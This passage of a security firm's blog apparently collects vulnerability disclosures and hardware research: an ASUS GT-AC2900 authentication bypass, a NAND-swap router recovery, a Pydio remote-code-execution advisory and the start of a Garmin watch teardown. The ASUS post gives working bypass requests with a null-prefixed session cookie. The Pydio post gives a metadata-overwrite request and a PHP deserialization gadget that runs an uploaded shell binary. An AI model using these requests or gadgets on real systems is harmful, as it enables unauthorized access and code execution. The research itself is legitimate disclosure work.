CVE-2021-32030: ASUS GT-AC2900 Authentication Bypass

In a previous blog post I had presented a creative method to resurrect a bricked device, in this post I will go over a vulnerability discovered within the running firmware.

(Atredis has also published an advisory on the vulnerability discussed in this post.)

How it started

When assessing a device, one of the first steps is to gain access to a copy of the software running on the device to assist in the process of understanding how it works. Firmware can be retrieved for a target either by downloading it from the manufacturer or extracting it from the target. In this case, the device manufacturer (ASUS) provides firmware updates. The firmware running on the target at the time of testing can be accessed at the following location:

https://dlcdnets.asus.com/pub/ASUS/wireless/GT-AC2900/FW_GT_AC2900_300438482072.zip

The decompressed CFE image can be easily extracted using the excellent binwalk tool (ensure that ubi_reader and jefferson dependencies are installed first):

binwalk -e GT-AC2900_3.0.0.4_384_82072-gc842320_cferom_ubi.w

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
144300        0x233AC         SHA256 hash constants, little endian
144572        0x234BC         CRC32 polynomial table, little endian
276396        0x437AC         SHA256 hash constants, little endian
276668        0x438BC         CRC32 polynomial table, little endian
408492        0x63BAC         SHA256 hash constants, little endian
408764        0x63CBC         CRC32 polynomial table, little endian
540588        0x83FAC         SHA256 hash constants, little endian
540860        0x840BC         CRC32 polynomial table, little endian
672684        0xA43AC         SHA256 hash constants, little endian
672956        0xA44BC         CRC32 polynomial table, little endian
804780        0xC47AC         SHA256 hash constants, little endian
805052        0xC48BC         CRC32 polynomial table, little endian
1048576       0x100000        JFFS2 filesystem, little endian
4456448       0x440000        UBI erase count header, version: 1, EC: 0x0, VID header offset: 0x800, data offset: 0x1000

ls -alh _GT-AC2900_3.0.0.4_384_82072-gc842320_cferom_ubi.w.extracted/
total 130M
drwxrwxr-x 4 chris chris 4.0K Jan 21 20:11 .
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:10 ..
-rw-rw-r-- 1 chris chris  67M Jan 21 20:10 100000.jffs2
-rw-rw-r-- 1 chris chris  64M Jan 21 20:11 440000.ubi
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:11 jffs2-root
drwxrwxr-x 3 chris chris 4.0K Jan 21 20:11 ubifs-root

Normally this would be the point where you would start digging for bugs; however, ASUS provides a nice GPL archive for their devices:

https://dlcdnets.asus.com/pub/ASUS/wireless/RT-AC2900/GPL_RT_AC2900_300438640451.zip

The archive contains just about everything you would need to build a working firmware image. The main caveat is that ASUS ships the interesting parts as prebuilt objects instead of the actual source. With that small detour out of the way, we can get back to the bug.

How it’s going

The ASUS GT-AC2900 device's administrative web application utilizes a session cookie (asus_token) to manage session states. While auditing the session handling functionality, I found that the validation of this cookie fails when the following occurs:

  • The submitted asus_token starts with a Null (0x0)

  • The request User-Agent matches an internal service UA (asusrouter--)

  • The device has not been configured with an ifttt_token (default state)

This condition results in the server incorrectly identifying the request as being authenticated. The following example shows a normal request and response for valid session:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=iCOPsFa54IUYc4alEFeOP4vjZrgspAY; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}

The following shows that the same request fails in the case an invalid asus_token is provided:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter-- 
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=Invalid; clickedItem_tab=0


HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"error_status":"2"
}

If a Null character is placed at the front of the asus_token, the request will be incorrectly identified as being authenticated, as seen in the following request and response:

GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0

HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}

How it’s actually going

Authentication and validation of requests occurs within the function handle_request, specifically through the function auth_check, which can be seen in the following code excerpt from the GPL source archive:

router/httpd/httpd.c - handle_request

static void
handle_request(void)
{
...
...
...
handler->auth(auth_userid, auth_passwd, auth_realm);
auth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); // <---- call to auth_check in web_hook.o
if (auth_result != 0) 
{
	if(strcasecmp(method, "post") == 0 && handler->input)	//response post request
		while (cl--) (void)fgetc(conn_fp);
        send_login_page(fromapp, auth_result, url, file, auth_check_dt, add_try);
        return;
}
...
...

The auth_check function is implemented within a compiled object (web_hook.o) which validates the received session identifier is valid. The process is broken down to the following items at a high level:

  • Check that the request cookies contain an asus_token

  • Check if the extracted asus_token exists within the current session list

  • Check if the extracted asus_token is a stored service token (IFTTT/Alexa)

The following decompiled pseudocode shows the underlying code responsible for carrying out this process:

router/httpd/prebuild/web_hook.o - auth_check

int __fastcall auth_check(char *dirname, char *authorization, const char *url, char *file, char *cookies, int fromapp_flag)
{
  void *v7; // r0
  bool v8; // cc
  char *v9; // r5
  int *v10; // r0
  int v11; // r5
  int *v12; // r4
  int v13; // r0
  int v14; // r0
  bool v15; // cc
  char *v16; // r5
  int *v17; // r0
  int result; // r0
  char *pAsusTokenKeyStart; // r0
  char *pAsusTokenValueStart; // r9
  size_t space_count; // r0
  unsigned int v22; // r2
  int *v23; // r0
  int v24; // r5
  int *v25; // r4
  int v26; // [sp+10h] [bp-50h]
  char user_token[32]; // [sp+1Ch] [bp-44h] BYREF

  v7 = memset(user_token, 0, sizeof(user_token));
  v26 = cur_login_ip_type;
...
...
...
  result = auth_passwd;
  if ( auth_passwd )
  {
    // check that the request has a cookie header set and the asus_token cookie exists
    // example header - Cookie: asus_token=iCOPsFa54IUYc4alEFeOP4vjZrgspAY; clickedItem_tab=0
    if ( !cookies || (pAsusTokenKeyStart = strstr(cookies, "asus_token")) == 0 ) // <-----
    {
      // check if this is the first access for initial setup - this is skipped
      if ( !is_firsttime() ) // <-----
      {
        add_try = 0;
        return 1;
      }
      goto PAGE_REDIRECT;
    }
    // find the location of the asus_token value
    pAsusTokenValueStart = pAsusTokenKeyStart + 11; // <-----
    space_count = strspn(pAsusTokenKeyStart + 11, " \t"); // <-----
    
    // set the user_token variable to the extracted value from the user request
    snprintf(user_token, 0x20u, "%s", &pAsusTokenValueStart[space_count]); // <-----
    
    // validate the user_token value, check_ifttt_token returns 1, causing the if statement to be skipped that would normally result in an authentication failure
    if ( !search_token_in_list(user_token, 0) && !check_ifttt_token(user_token) ) // <-----

The check_ifttt_token function compares the user submitted value to the stored configuration value currently stored in the systems NVRAM configuration. The following shows the decompiled pseudocode for this function:

router/httpd/prebuild/web_hook.o - check_ifttt_token

int __fastcall check_ifttt_token(const char *asus_token)
{
  char *ifft_token; // r0
  char *v3; // r0
  int result; // r0
  ifft_token = nvram_safe_get("ifttt_token"); // <----- returns \0

The function nvram_safe_get is used to retrieve the stored iftt_token value from the systems NVRAM configuration, which can be seen in the following decompiled pseudocode:

router/httpd/prebuild/web_hook.o - nvram_safe_get
char *__fastcall nvram_safe_get(char* setting_key)
{
  char *result; // r0

  result = nvram_get(setting_key);
  if ( !result )
    result = "\0";
  return result;
}

In the case the NVRAM configuration does not contain a value for the requested setting, the function returns "\0" (Null). As the submitted asus_token has been set to a Null from the original request the string comparison will indicate that the values are equal and the check_iftt_token function will return true (1), as seen in the following pseudocode:

router/httpd/prebuild/web_hook.o - check_ifttt_token

ifft_token = nvram_safe_get("ifttt_token"); // <----- returns \0
  if ( !strcmp(asus_token, ifft_token) ) // <----- returns 0 as they match, evals to true and login is successful
  {
    // if the IFTTT_ALEXA log file is enabled, log successful check message
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] IFTTT/ALEXA long token success.\n", "check_ifttt_token", 760);
      
      // Return 1
      result = 1; // <----- set result value
  }
  else// <----- skipped
  {
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] IFTTT/ALEXA long token fail.\n", "check_ifttt_token", 766);
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
      Debug2File(
        "/tmp/IFTTT_ALEXA.log",
        "[%s:(%d)][HTTPD] IFTTT/ALEXA long token is %s.\n",
        "check_ifttt_token",
        767,
        asus_token);
    if ( isFileExist("/tmp/IFTTT_ALEXA") > 0 )
    {
      v3 = nvram_safe_get("ifttt_token");
      Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] httpd long token is %s.\n", "check_ifttt_token", 768, v3);
    }
    result = 0;
  }
  return result; // <----- return 1
}

Continuing back within auth_check, the check_ifttt_token return value causes the if statement to evaluate to false, skipping the code path that would result in a failed authentication attempt, resulting in the authentication process to succeed:

router/httpd/prebuild/web_hook.o - auth_check

  if ( !search_token_in_list(user_token, 0) && !check_ifttt_token(user_token) ) // <-----
   {
      if ( !is_firsttime() )
      {
        if ( !strcmp(last_fail_token, user_token) )
        {
          add_try = 0;
        }
        else
        {
          strlcpy(last_fail_token, user_token, 32);
          add_try = 1;
        }
        v23 = _errno_location();
        v24 = *v23;
        v25 = v23;
        if ( f_exists("/tmp/HTTPD_DEBUG") > 0 || nvram_get_int("HTTPD_DBG") > 0 )
          asusdebuglog(6, "/jffs/HTTPD_DEBUG.log", 0, 1, 0, "[%s(%d)]:AUTHFAIL\n\n", "auth_check", 1054);
        result = 2;
        *v25 = v24;
        return result;
      }
PAGE_REDIRECT:
      page_default_redirect(fromapp_flag, url);
      return 0;
    }
...
...
  return result;
}

By monitoring the system logs confirmation of successful IFTTT/ALEXA login token processing can be seen when submitting a malformed asus_token:

admin@GT-AC2900-3711:/jffs# tail -f /tmp/IFTTT_ALEXA.log
[check_ifttt_token:(1014)][HTTPD] IFTTT/ALEXA long token success.

How it ends

ASUS released an updated firmware image that addresses this vulnerability that can be downloaded from their support site.

NANDcromancy: Live Swapping NAND Flash

Often when assessing an embedded system, changes can occur (intended or otherwise) that cause the target system to enter a state where it no longer works ('bricked'). In some cases fixing the target is as simple as performing a "factory reset", others may be slightly more involved and require flashing the target using a debug interface (JTAG/SWD/*) or manually flashing an external storage device (SPI/NOR/Nand/eMMC). This post walks through resolving a situation where a target has been 'bricked' with a creative methodology.

During some downtime, I was poking at an off the shelf consumer router that was using Common Firmware Environment (CFE) as a boot loader. While interacting with the CFE trying to identify arguments that are passed to the target's operating system at boot, the system configuration was accidentally corrupted:

CFE> b
Press:  <enter> to use current value
        '-' to go previous parameter
        '.' to clear the current value
        'x' to exit this command
94908AC5300R               ------ 03
94906REF                   ------ 07
GT-AC2900                  ------ 08
Board Id                          :  8  X     <---- whoops
Number of MAC Addresses (1-64)    :  10  ^C   <---- more whoops
x
Memory Configuration Changed -- REBOOT NEEDED <---- whoops saved. 
flow memory allocation (MB)       :  14  ----

At this point I figured a final save/write would be required to commit the accidental changes, so I opted to just power cycle the device to avoid making permanent changes. After power cycling the device, an error occurred:

Shmoo WR DM
WR DM
   0000000000111111111122222222223333333333444444444455555555556666666666
   0123456789012345678901234567890123456789012345678901234567890123456789
00 ------++++++++++++++++++++++++++X+++++++++++++++++++++++++++----------
01 --+++++++++++++++++++++++++X++++++++++++++++++++++++++----------------
02 X---------------------------------------------------------------------
03 X---------------------------------------------------------------------
MEMSYS init failed, return code 00000001
MEMC error:  0x00000000
PHY error:  0x00000000
SHMOO error:  0x10c00000 
 0x00000082
 0x00000000

When the device came back up, it immediately produced the previous error and failed to enter the CFE. Without being able to access the boot loader, the configuration could not be changed and the boot loader's recovery process could not be utilized either. Searching online for this error was not helpful and resulted in dead ends and the general consensus is if you corrupt CFE in this manner - the device is 'bricked'. At this point I switched to working with my backup device (always have a backup) so I could answer my original question regarding interesting target arguments. As an aside, the setting kernp mfg_nvram_mode=1 mfg_nvram_url=BADURL is particularly interesting.

Later on I circled back to the bricked unit to identify a path to fix it. The target is using a Broadcom SoC and an unpopulated header was found to provide JTAG access:

1.png

After enumerating the JTAG pinout on the unpopulated header with a JTagulator, it was possible to confirm access using OpenOCD:

$ openocd -f ../interface/jlink.cfg -f bcm49.cfg
Open On-Chip Debugger 0.11.0-rc2+dev-gba0f382-dirty (2021-02-26-14:07)
Licensed under GNU GPL v2
For bug reports, read
    http://openocd.org/doc/doxygen/bugs.html
DEPRECATED! use 'adapter speed' not 'adapter_khz'
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : J-Link V10 compiled Dec 11 2020 15:39:30
Info : Hardware version: 10.10
Info : VTarget = 3.323 V
Info : clock speed 1000 kHz
Info : JTAG tap: bcm490x.tap tap/device found: 0x5ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x5)
Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x4)
Info : JTAG tap: auto1.tap tap/device found: 0x0490617f (mfg: 0x0bf (Broadcom), part: 0x4906, ver: 0x0)
Info : JTAG tap: auto2.tap tap/device found: 0x0490617f (mfg: 0x0bf (Broadcom), part: 0x4906, ver: 0x0)
Info : bcm490x.a53.0: hardware has 6 breakpoints, 4 watchpoints

The other path for restoring the system is through the storage device, a Macronix NAND chip:

2.png

At this point I started to wonder about something, I still had a working device that I could boot into the boot loader - would it be possible to swap the NAND chip on a running device and use it to flash the corrupted NAND?

Before attempting anything, I asked a co-worker if he thought this stupid idea would have any chance at working, he wasn't optimistic on the outcome (to be fair, I wasn't either) - we made a bet on the results and I went to work.

The first stage of testing was to find out if the system would tolerate having the NAND 'removed' while running? I knew that answering this question I would need to be more methodical than just hitting the unit with hot air while its running and removing the chip. The first stage of this process was to identify how the NAND is being powered. The layout looks like VCC is tied into the chip in the following locations:

NAND Power Sources

With the VCC lines identified, the easiest way to answer our first question would be to remove the VCC lines from the NAND while the system is running. In order to do this, my first try was to cut the VCC lines and add 'jumper' wires (36 AWG Magnet Wire is great stuff) that can be disconnected once the boot loader is done:

Initial VCC Jumper Locations

On the right hand side I chose to cut further back on the power trace thinking it would be a better spot as it feeds into a few pins on the NAND. On the first jumper install I used a fiberglass scratch pen to remove the coating and expose the copper and a small knife to cut the trace:

Terrible Jumper Install

The result was gross as the scratch pen tip was far too big and I ended up exposing lots of copper. Don't use a scratch pen, just a fine tipped knife so you don't end up with a mess. More like this:

6.png
7.png

With the 'jumpers' installed and connected, the target was powered up to the boot loader (CFE) and the command dn (dump nand) was used to ensure the NAND was accessible, power was then removed by disconnecting the jumper wires:

CFE> dn
------------------ block: 0, page: 0 ------------------
00000000: 00000000 00000000 00000000 00000000    ................
00000010: 00000000 00000000 00000000 00000000    ................
00000020: 00000000 00000000 00000000 00000000    ................
<CUT FOR LENGTH>

----------- spare area for block 0, page 0 -----------
00000800: ff851903 20000008 00fff645 c2b9bf55    .... ......E...U
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.

*** command status = 1
CFE>
web info: Waiting for connection on socket 1.␛[J
CFE>
web info: Waiting for connection on socket 0.␛[J
CFE> ␀----       <----- VCC Removed (reboot)

When the power was removed (marked with 'VCC Removed') the target rebooted and failed to return to the boot loader as the NAND was not accessible. The source of the problem was the right side power cut was in a spot that removed power from the SoC as well as the NAND. Keeping it simple, the initial cut was restored and only the trace closest to the NAND was cut and jumpered:

8.png

Bringing the system back up and attempting the previous test gave me the answer to my initial question: when the power is removed by disconnecting the jumper wires, the system remains operational, as confirmed by running the dn command:

<----- NAND VCC Removed 
CFE> dn
------------------ block: 0, page: 2 ------------------
Status wait timeout: nandsts=0x30000000 mask=0x80000000, count=2000000
Error reading block 0
00001000: 00000000 00000000 00000000 00000000    ................
<CUT FOR LENGTH>
Status wait timeout: nandsts=0x30000000 mask=0x80000000, count=2000000
----------- spare area for block 0, page 2 -----------
00000800: 00000000 00000000 00000000 00000000    ................
00000810: 00000000 00000000 00000000 00000000    ................
00000820: 00000000 00000000 00000000 00000000    ................
00000830: 00000000 00000000 00000000 00000000    ................
Error reading block 0 
*** command status = -1      <----- Expected error reading NAND 
CFE>
CFE>
CFE>
<----- NAND VCC Enabled 
CFE>
CFE> dn
------------------ block: 0, page: 3 ------------------
00001800: 00000000 00000000 00000000 00000000    ................
00001810: 00000000 00000000 00000000 00000000    ................
<CUT FOR LENGTH>
----------- spare area for block 0, page 3 -----------
00000800: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
*** command status = 1      <----- Successful NAND read
CFE>

By confirming it is possible to 'turn off' the NAND on the running system without disrupting the boot loader, the next step was to try to power down the NAND and physically remove it from the board while it's running.

Using hot air and tweezers, one side was lifted at a time (right side then left):

9.png

This process resulted in the system restarting and failing to enter the boot loader:

CFE> ␀----    <----- NAND Removed (reboot)
BTRM
V1.6
CPU0
L1CD
MMUI
MMU7
DATA
ZBBS
MAIN
OTP?
OTPP
USBT
NAND
IMG?
FAIL
␀----         <----- FAIL boot loop

Since I had lifted the NAND off one side at a time while monitoring the console it was easy to see that the reboot occurred when lifting the "left" side of the NAND:

10.png

The most likely culprits were the Read Enable (RE#) or Ready/Busy (R/B#) pins changing state. To test this, jumper wires were added to both:

11.png

At this point the NAND had to be placed back on the board in order to return the system back to the boot loader, the NAND was once again powered down by disconnecting the VCC jumpers and the RE#,R/B# lines were held low by attaching them to ground:

12.png

The NAND was again removed, working one side at a time while monitoring the boot loader console:

13.png

This time the boot loader remained active and the system did not reboot. With one more part of the puzzle completed it was time to move on to the next step - attaching the corrupted NAND to the running target.

Once again hot air was used to solder the replacement NAND to the target, the first attempt was unsuccessful as some pins were shorted when trying to get the alignment right on both sides. As encountered previously, failure at this point requires starting the entire process over again - the replacement NAND had to be removed and the original had to be placed back on the board.

For the second attempt, a small piece of paper was used to insulate one side of the NAND while the other was aligned and attached with hot air:

14.png

Once the first side was attached, the paper was removed and the other side was attached. The boot loader remained active once the new NAND was in place. The next step was to re-enable the RE#,R/B# pins by removing the ground jumper wires and finally VCC jumper was reattached. Once everything was reconnected, confirmation that the NAND was available was done again with the dn command:

CFE> dn
------------------ block: 0, page: 0 ------------------
00000000: 00000000 00000000 00000000 00000000    ................
00000010: 00000000 00000000 00000000 00000000    ................
00000020: 00000000 00000000 00000000 00000000    ................
<CUT FOR LENGTH>
----------- spare area for block 0, page 0 -----------
00000800: ff851903 20080000 00c2b822 c978ff97    .... ......".x..
00000810: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000820: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.
00000830: ffffffff ffffffff ffee9423 4ba37819    ...........#K.x.

*** command status = 1   <----- Success!
CFE>

With a successful test read completed, the factory firmware image was loaded through the boot loader's web interface:

web info: Waiting for connection on socket 1.␛[J
web info: Upload 70647828 bytes, flash image format.␛[J   <----- Image Upload
CFE> ........

Setting JFFS2 sequence number to 13

Flashing root file system at address 0x06000000 (flash offset 0x06000000): <-----Image Write
.................................................................... .....................................................................
....................................................................
....................................................................
....................................................................
....................................................................
....................................................................
....................................................................
Resetting board in 0 seconds...�----
BTRM
V1.6
CPU0
L1CD
MMUI
MMU7
DATA
ZBBS
MAIN
OTP?
OTPP
USBT
NAND
IMG?
IMGL
UHD?
UHDP
RLO?
RLOP
UBI?
UBIP
PASS    
----
<CUT FOR LENGTH>
CFE version 1.0.38-161.122 for BCM94908 (64bit,SP,LE)
Build Date: Mon May 13 08:23:21 CST 2019 (defjovi@ubuntu-eva02)
Copyright (C) 2000-2015 Broadcom Corporation.

Boot Strap Register:  0x6fc42
Chip ID: BCM4906_A0, Broadcom B53 Quad Core: 1800MHz
Total Memory: 536870912 bytes (512MB)
Status wait timeout: nandsts=0x50000000 mask=0x40000000, count=0
NAND ECC BCH-4, page size 0x800 bytes, spare size used 64 bytes
NAND flash device: , id 0xc2da block 128KB size 262144KB
<CUT FOR LENGTH>
Initalizing switch low level hardware.
pmc_switch_power_up: Rgmii Tx clock zone1 enable 1 zone2 enable 1.
Software Resetting Switch ... Done.
Waiting MAC port Rx/Tx to be enabled by hardware ...Done
Disable Switch All MAC port Rx/Tx
*** Press any key to stop auto run (1 seconds) ***
Auto run second count down: 0
Booting from only image (address 0x06000000, flash offset 0x06000000) ...  <----- Success!!111!
Decompression LZMA Image OK!
Entry at 0x0000000000080000
Starting program at 0x0000000000080000
/memory = 0x20000000
Booting Linux on physical CPU 0x0
Linux version 4.1.27 (jenkins@asuswrt-build-server) (gcc version 5.3.0 (Buildroot 2016.02) ) #2 SMP PREEMPT Fri Jun 19 13:05:44 CST 2020
CPU: AArch64 Processor [420f1000] revision 0
Detected VIPT I-cache on CPU0

As shown in the output, the flash was successful and the system booted into the target operating system.

I am sure some reading this will say - "why not use $device_name_here chip reader/writer to reprogram the NAND?", which is an absolutely fair question and probably makes more sense than this nonsense; However, I believe the fitting quote to reference here is one by the famous chaos theory mathematician:

'Your scientists were so preoccupied with whether they could, they didn't stop to think if they should'

- Dr. Jeffrey Goldblum

QEMU and U: Whole-system tracing with QEMU customization

QEMU and U: Whole-system tracing with QEMU customization

QEMU is a key tool for anyone searching for bugs in diverse places. Besides just opening the doors to expensive or opaque platforms, QEMU has several internal tools available to enable developer’s further insight and control. Researchers comfortable modifying QEMU have access to powerful inspection capabilities. We will walk through a recent custom addition to QEMU to highlight some helpful internal tools and demonstrate the power of a hackable emulator.

Authenticated RCE in Pydio (Forever-Day) -- CVE-2020-28913

Pydio (formerly AjaXplorer) is an open source web application for remotely managing and sharing files. Users may upload files to the server and then are enabled to share files with public links in a similar way that Google Drive, Dropbox, or other cloud services work.

By sending a file copy request with a special HTTP variable used in code, but not exposed in the web UI, an attacker can overwrite the .ajxp_meta file. The .ajxp_meta file is a serialized PHP object written to the user’s directory and is deserialized when Pydio needs information about files it stores.

POST /pydio/index.php? HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/pydio/ws-my-files/
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://example.com
Content-Length: 124
Connection: close
Cookie: AjaXplorer=ak7jio5pphe6onko1gcofj05k4

get_action=copy&targetBaseName=../.ajxp_meta&dir=%2F&nodes[]=%2Fpayload&dest=%2F&secure_token=sG9TmYIkNsWTEEx5p5qLCHJcty0MfyQ3

Note the HTTP variable targetBaseName which defines a new name for the file copy. This variable is not checked to prevent overwriting special files. After uploading a file called payload containing our PHP gadget, we copy it over the .ajxp_meta file.

The contents of the payload file you can override the .ajxp_meta with may look similar to this PHP gadget. In tools like phpggc, which store collection of gadgets, there are a few that looked promising. However, in my own testing, none of the gadgets worked and I didn’t dig enough to find out why. Instead, I found a class used to generate Captcha images, which allowed you define a custom SoX binary path (so the captcha can be read for accessibility). This was my first foray into PHP gadgets and the path to finding this class was haphazard at best.

O:26:"GuzzleHttp\Stream\FnStream":1:{s:9:"_fn_close";a:2:{i:0;O:10:"Securimage":7:{s:13:"wordlist_file";s:62:"/usr/share/pydio/core/vendor/dapphp/securimage/words/words.txt";s:12:"captcha_type";i:2;s:13:"audio_use_sox";b:1;s:15:"sox_binary_path";s:56:"/var/lib/pydio/personal/atredis/shell.elf";s:13:"database_file";s:47:"/var/lib/pydio/personal/atredis/fdsa.db";s:12:"use_database";b:1;s:9:"namespace";s:4:"fdsa";}i:1;s:15:"outputAudioFile";}}

The above PHP object gadget will attempt to run a binary file that has been uploaded to the user's directory called shell.elf. We do make an assumption about a path on the server by passing an absolute path to the shell binary we uploaded. During testing, the location in the gadget was the default location with no special Pydio configurations.

This vulnerability affects the last release of Pydio Core (8.2.5) and likely many versions prior. Git blame places the code originally being committed in late 2016.

fdsa.png

Pydio Core is considered End-of-Life by the Pydio developers and, as such, will receive no security patches going forward. Pydio Enterprise users should contact Pydio directly to mitigate the issue. The Pydio developers encourage users to upgrade to Pydio Cells, which is a complete rewrite of Pydio in Go and is not vulnerable.

Timeline

* 2020-09-03: Atredis Partners sent an initial notification to vendor, including a draft advisory.

* 2020-10-26: Atredis Partners sends an initial notification to CERT/CC (VRF#20-10-SWJYN).

* 2020-11-17: CVE-2020-28913 assigned by MITRE

* 2020-12-07: Atredis Partners publishes this advisory.


This blog post was written by Brandon Perry, technical peer review by Dion Blazakis, and edited for the web by Lacey Kasten at Atredis Partners.

A Watch, a Virtual Machine, and Broken Abstractions

Garmin Forerunner 235

One upside to living in a cyberpunk-adjacent fever dream is the multitude of (relatively) inexpensive supercomputers you can strap to your body. I recently bought a watch equipped with an array of sensors (and supporting microcontrollers) to record hikes, runs, and rides. The device, a Garmin Forerunner 235, is far from the most advanced piece of technology you can buy to perform these tasks but, so far, has performed well. My partner also has a Garmin watch and rushed to show me all of the customization options available via Garmin’s ConnectIQ Store and App. That's how this all started.

Here at Atredis Partners, I spend a good chunk of time under the delusion I'm a modern Sherlock Holmes. From the outside, I'm just a middle aged person lacking sleep and, evidently, the wherewithal to shave regularly. But, in my head, I'm hot on the trail of some computational mystery. Each engagement is a frantic sprint from layman to myopic expert. To give our customers the best assessment of their technology, we have to optimize where our time is spent. We need to understand the system design in order to evaluate tradeoffs between attack surface, impact, and complexity. The sooner we understand a technology, the more hours we have to allocate and arrange, Jenga-like, into a plan of attack. The more complete our understanding, the more accurate and complete our determination of impact and severity. When you spend your life understanding the most important (for some definition) parts of hundreds of devices in three week bursts of effort, every device looks like a new mystery to be solved.

Some people would spend their time away from these mental sprints actually hiking, running, or biking with their cool new watch (and I do that, sometimes). I, instead, needed to understand how this wrist-based computational cluster worked. To be precise, this project was driven by my curiosity, not by nascent privacy concern. This project wasn't an effort to point out all the security bugs or persuade you that balaclava-clad shadows are tracking your every movement. I make no privacy judgement either way -- you'll have to judge your own risk tolerance. Finally, I've enjoyed my Garmin watch and the company was easy to work with while reporting issues. This isn't an indictment of their products.

TL;DR: I'm a nerd. I bought an exercise watch and promptly stopped exercising to tear it apart.

Information Gathering

ConnectIQ

All of this started with a casual mention that Garmin provides a third party app store, ConnectIQ (abbreviated as CIQ), for Garmin devices. CIQ consists of an app store (https://apps.garmin.com/en-US/), a smart phone app to install CIQ Apps on your Garmin device, and a free software development kit (SDK) for developing CIQ Apps (https://developer.garmin.com/connect-iq/overview/). With my deerstalker on and a pipe firmly between my teeth, the link to the ConnectIQ SDK was the first note I took in my gumshoe notebook. As far as attack surface goes (even in our broader lens of overall system understanding), being able to run code on the device is hard to beat when it comes to tools for understanding a system.

Firmware

The firmware was the next clue, and this one was a gamble. Devices often have encrypted or "encrypted" (encoded with the intent to obfuscate) firmware. In this case, a quick web search turned up a community repository of installable firmware updates for Garmin devices (repository is currently down). I jotted down the Forerunner 235 firmware in my metaphorical steno pad.

Hardware

The firmware runs on some set of programmable devices within the watch. Without knowing which microcontrollers are included in the watch design, reversing is more difficult. Knowing the architecture and memory map of the system-on-chips (SoCs) used will provide more clues towards understanding how the firmware is loaded and executed. Having a bill-of-materials or some approximation of such is not a strict necessity, but provides a good reference going forward while taking apart the firmware. Another web search turned up a teardown for a similar device and the FCC images provided additional clues. These were also recorded in the notepad, providing another category of data to draw from.

The Screaming Hoards

Lastly and reluctantly, it’s time to check if anyone has stolen our fun. Has someone already written up their efforts at understanding a Garmin device? Some searching produced a very nice write up of a TomTom watch and a handful of file format reverse engineering. This is a considerably good outcome -- our fun hadn’t been cut off but we do have a head start on some of the artifacts we'll need to analyze. I took note of links to the firmware update format (RGN) and a GitHub repository related to the CIQ application format (PRG).

Our Investigative Notes So Far

Device Hardware

Datasheets (based on the 735XT teardown -- not sure about 235)

Development Kits

Device Firmware

Host Tools

Similar Stuff

Moving on to Monkey C

The Game is Afoot

With our initial flurry of web searches done, it was time to start somewhere. As I mentioned above, the ability to run your own code on the watch seems like a great place to start. Heading to the Garmin ConnectIQ site and reading more about the developer tools revealed that CIQ Apps are developed in a custom language called Monkey C. A custom language is surprising enough to require some follow-up research before diving into the actual SDK provided. The question at hand was: why did Garmin decide on a custom language?

Before unraveling that question, it’s important to take a glance at the language. As you can see below, the language appears to be made of JavaScript and Java.

using Toybox.WatchUi;
using Toybox.Graphics;
using Toybox.System;
using Toybox.Lang;

class AtrediFaceView extends WatchUi.WatchFace {
...
    function onExitSleep() {
        System.println("onExitSleep");
        foo();
    }

    function foo() {
        var x = 0xf00d;
        System.println("0xf00d + 1 = " + (x + 1).toString());
